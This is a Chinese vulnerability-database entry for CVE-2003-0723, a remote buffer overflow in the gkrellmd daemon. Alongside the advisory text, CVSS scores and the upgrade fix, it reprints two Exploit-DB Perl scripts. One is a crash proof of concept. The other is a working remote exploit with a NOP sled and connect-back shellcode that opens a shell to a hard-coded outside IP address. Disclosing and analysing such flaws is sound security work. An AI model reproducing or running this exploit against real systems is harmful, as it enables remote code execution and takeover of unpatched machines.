CVE-2003-0723
CVSS7.5
发布时间 :2003-10-20 00:00:00
修订时间 :2008-09-10 15:20:15
NMCOE    

[原文]Buffer overflow in gkrellmd for gkrellm 2.1.x before 2.1.14 may allow remote attackers to execute arbitrary code.


[CNNVD]gkrellm gkrellmd缓冲区溢出漏洞(CNNVD-200310-032)

        gkrellm 2.1.14之前2.1.x版本的gkrellmd存在缓冲区溢出漏洞。远程攻击者利用该漏洞执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:gkrellm:gkrellm:2.1.7
cpe:/a:gkrellm:gkrellm:2.1.13

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0723
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0723
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200310-032
(官方数据源) CNNVD

- 其它链接及资源

http://www.mandriva.com/security/advisories?name=MDKSA-2003:087
(UNKNOWN)  MANDRAKE  MDKSA-2003:087

- 漏洞信息

gkrellm gkrellmd缓冲区溢出漏洞
高危 缓冲区溢出
2003-10-20 00:00:00 2005-10-20 00:00:00
远程  
        gkrellm 2.1.14之前2.1.x版本的gkrellmd存在缓冲区溢出漏洞。远程攻击者利用该漏洞执行任意代码。

- 公告与补丁

        

- 漏洞信息 (22831)

Gkrellmd 2.1 Remote Buffer Overflow Vulnerability (1) (EDBID:22831)
freebsd dos
2003-06-24 Verified
0 dodo
N/A [点击下载]
source: http://www.securityfocus.com/bid/8022/info

GKrellMd has been reported prone to a remote buffer overflow vulnerability, arbitrary code execution is possible.

The issue presents itself due to a lack of sufficient bounds checking performed on network-based data. If data exceeding the maximum reserved memory buffer size is received arbitrary memory may be corrupted.

A remote attacker may ultimately exploit this issue remotely to seize control of the affected daemon and execute arbitrary code.

This vulnerability has been reported to affect Gkrellm 2.1.13.

	#!/usr/bin/perl -s
	use IO::Socket;
	#
	# proof of concept code
	# tested: grkellmd 2.1.10
	#



		if(!$ARGV[0] || !$ARGV[1])
		{ print "usage: ./gkrellmcrash.pl <host> <port>\n"; exit(-1); }

	$host = $ARGV[0];
	$port = $ARGV[1];
	$exploitstring = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

	$socket = new IO::Socket::INET
	(
	Proto    => "tcp",
	PeerAddr => $host,
	PeerPort => $port,
	);

	die "unable to connect to $host:$port ($!)\n" unless $socket;

	print $socket "gkrellm 2.1.10\n"; #tell the daemon wich client we have
	sleep(1);
	print $socket $exploitstring;

	close($socket);
		

- 漏洞信息 (22832)

Gkrellmd 2.1 Remote Buffer Overflow Vulnerability (2) (EDBID:22832)
freebsd remote
2003-06-24 Verified
0 dodo
N/A [点击下载]
source: http://www.securityfocus.com/bid/8022/info
 
GKrellMd has been reported prone to a remote buffer overflow vulnerability, arbitrary code execution is possible.
 
The issue presents itself due to a lack of sufficient bounds checking performed on network-based data. If data exceeding the maximum reserved memory buffer size is received arbitrary memory may be corrupted.
 
A remote attacker may ultimately exploit this issue remotely to seize control of the affected daemon and execute arbitrary code.
 
This vulnerability has been reported to affect Gkrellm 2.1.13.

#!/usr/bin/perl -s
# kokaninATdtors.net playing with gkrellmd on FreeBSD 4.8-RELEASE
# advisory on http://packetstormsecurity.nl/0306-exploits/gkrellmd
# I just ripped their code and made it do something useful instead
# shellcode by bighawk(i think) - wow this is badly formatted.

use IO::Socket;
if(!$ARGV[0] || !$ARGV[1])
{ print "usage: ./DSR-geekrellm.pl <host> <port> (default gkrellmd is 19150)\n"; exit(-1); }

$host = $ARGV[0];
$port = $ARGV[1];
$ret = pack("l",0xbfbffa60);
$shellcode = "\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x68\xd9\x9d\x26\x26\x66\x68\x27\x10\x66\x51\x89\xe6\xb2\x10\x52\x56\x50\x50\xb0\x62\xcd\x80\x41\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80";
#--> connect-back to a useless ip, change it:)                                     ^^217.157.38.38^        ^^10000^
$nop = "\x90";
$buf = "A" x 128 . $ret x 2 . $nop x 500 . $shellcode;

$socket = new IO::Socket::INET
(
Proto    => "tcp",
PeerAddr => $host,
PeerPort => $port,
);

die "unable to connect to $host:$port ($!)\n" unless $socket;

print $socket "gkrellm 2.1.10\n"; #tell the daemon wich client we have
sleep(1); #might have to adjust this on slow connections
print $socket $buf;

close($socket);
		

- 漏洞信息

8634
GKrellM gkrellmd Client Data Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in gkrellm. The gkrellmd daemon included with gkrellm fails to check the maximum buffer size as it receives data from the network resulting in a buffer overflow. With a specially crafted request with data over 128 bytes long, an attacker can execute arbitrary code resulting in a loss of integrity.

- 时间线

2003-06-22 Unknow
2003-06-22 Unknow

- 解决方案

Upgrade to version 2.1.14 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站